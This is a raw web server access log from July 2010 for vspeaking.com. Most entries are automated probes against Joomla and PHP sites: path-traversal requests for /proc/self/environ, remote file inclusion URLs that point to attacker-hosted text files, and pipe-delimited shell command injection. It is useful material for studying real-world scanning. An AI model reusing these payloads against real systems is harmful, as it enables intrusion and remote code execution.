67.195.37.180 - - [25/Jul/2010:23:20:02 -0700] "GET /?M=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:20:46 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:20:46 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:20:46 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:24:23 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:24:24 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:24:24 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:28:00 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
195.199.244.244 - - [25/Jul/2010:23:28:50 -0700] "GET /logs/access_100607.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.vspeaking.com"
195.199.244.244 - - [25/Jul/2010:23:28:50 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.vspeaking.com"
195.199.244.244 - - [25/Jul/2010:23:28:50 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:28:54 -0700] "GET /index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:28:55 -0700] "GET /logs/access.log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:28:55 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:28:55 -0700] "GET /index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:28:55 -0700] "GET /logs/access.log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:28:55 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:30:00 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:30:01 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:30:01 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:30:07 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:30:08 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:30:08 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.98.217.83 - - [25/Jul/2010:23:31:16 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
87.98.217.83 - - [25/Jul/2010:23:31:16 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
87.98.217.83 - - [25/Jul/2010:23:31:16 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
87.98.217.83 - - [25/Jul/2010:23:31:17 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
87.98.217.83 - - [25/Jul/2010:23:31:17 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
87.98.217.83 - - [25/Jul/2010:23:31:17 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:32:16 -0700] "GET /logs/access.log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:32:17 -0700] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:32:17 -0700] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:32:32 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:32:32 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:32:33 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:32:35 -0700] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:32:36 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.205.67.73 - - [25/Jul/2010:23:32:36 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
217.73.227.10 - - [25/Jul/2010:23:33:01 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "vspeaking.com"
217.73.227.10 - - [25/Jul/2010:23:33:01 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "vspeaking.com"
217.73.227.10 - - [25/Jul/2010:23:33:01 -0700] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "vspeaking.com"
207.46.199.179 - - [25/Jul/2010:23:33:11 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:11 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:11 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:11 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:11 -0700] "GET /logs/access_100705.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:11 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:11 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:11 -0700] "GET /logs/access_100705.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:11 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:11 -0700] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:12 -0700] "GET /logs/access_100705.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:12 -0700] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
195.186.81.46 - - [25/Jul/2010:23:33:12 -0700] "GET /logs/access_100705.log/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
217.73.227.10 - - [25/Jul/2010:23:33:15 -0700] "GET /logs/access.log%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:34:19 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:34:20 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:34:20 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
88.250.57.232 - - [25/Jul/2010:23:36:03 -0700] "GET /logs/access_100726.log HTTP/1.0" 200 3446806 "-" "Wget/1.11.4" "www.vspeaking.com"
203.105.83.126 - - [25/Jul/2010:23:36:20 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.vspeaking.com"
203.105.83.126 - - [25/Jul/2010:23:36:20 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.vspeaking.com"
203.105.83.126 - - [25/Jul/2010:23:36:20 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.vspeaking.com"
203.105.83.126 - - [25/Jul/2010:23:36:54 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.vspeaking.com"
203.105.83.126 - - [25/Jul/2010:23:36:55 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.vspeaking.com"
203.105.83.126 - - [25/Jul/2010:23:36:55 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:37:46 -0700] "GET /logs/access.log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:37:46 -0700] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:37:47 -0700] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
74.52.48.66 - - [25/Jul/2010:23:38:15 -0700] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 2230 "-" "Mozilla/5.0" "vspeaking.com"
74.52.48.66 - - [25/Jul/2010:23:38:15 -0700] "GET /?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
74.52.48.66 - - [25/Jul/2010:23:38:15 -0700] "GET /logs/scripts.log//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
74.52.48.66 - - [25/Jul/2010:23:38:42 -0700] "GET /logs//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 2230 "-" "Mozilla/5.0" "vspeaking.com"
74.52.48.66 - - [25/Jul/2010:23:38:42 -0700] "GET /?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
74.52.48.66 - - [25/Jul/2010:23:38:42 -0700] "GET /logs/scripts.log//?_PHPLIB[libdir]=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:40:31 -0700] "GET /index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:40:31 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:40:31 -0700] "GET /logs/access.log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:40:31 -0700] "GET /index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:40:31 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:40:31 -0700] "GET /logs/access.log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
212.92.13.125 - - [25/Jul/2010:23:41:37 -0700] "GET /index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
212.92.13.125 - - [25/Jul/2010:23:41:37 -0700] "GET /index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
212.92.13.125 - - [25/Jul/2010:23:41:39 -0700] "GET /logs/access.log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
212.92.13.125 - - [25/Jul/2010:23:41:39 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
212.92.13.125 - - [25/Jul/2010:23:41:39 -0700] "GET /logs/access.log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
212.92.13.125 - - [25/Jul/2010:23:41:39 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
72.40.25.105 - - [25/Jul/2010:23:43:22 -0700] "GET /favicon.ico HTTP/1.1" 301 - "http://www.google.com/search?q=filetype%3Alog+access.log+-CVS&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729)" "www.vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:44:12 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:44:12 -0700] "GET /logs/access.log%20%20//index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:44:12 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:44:12 -0700] "GET /logs/access.log%20%20//index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:44:17 -0700] "GET /index.php?option=com_rokdownloads&controller=http://lapl8ball.com//id/new/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
74.81.81.17 - - [25/Jul/2010:23:44:17 -0700] "GET /index.php?option=com_rokdownloads&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "vspeaking.com"
200.172.21.6 - - [25/Jul/2010:23:44:22 -0700] "GET /protection.php?action=logout&siteurl=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [25/Jul/2010:23:44:22 -0700] "GET /logs/access_100607.log/protection.php?action=logout&siteurl=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [25/Jul/2010:23:44:22 -0700] "GET /logs/protection.php?action=logout&siteurl=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
200.172.21.6 - - [25/Jul/2010:23:44:22 -0700] "GET /logs/access_100607.log/protection.php?action=logout&siteurl=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.vspeaking.com"
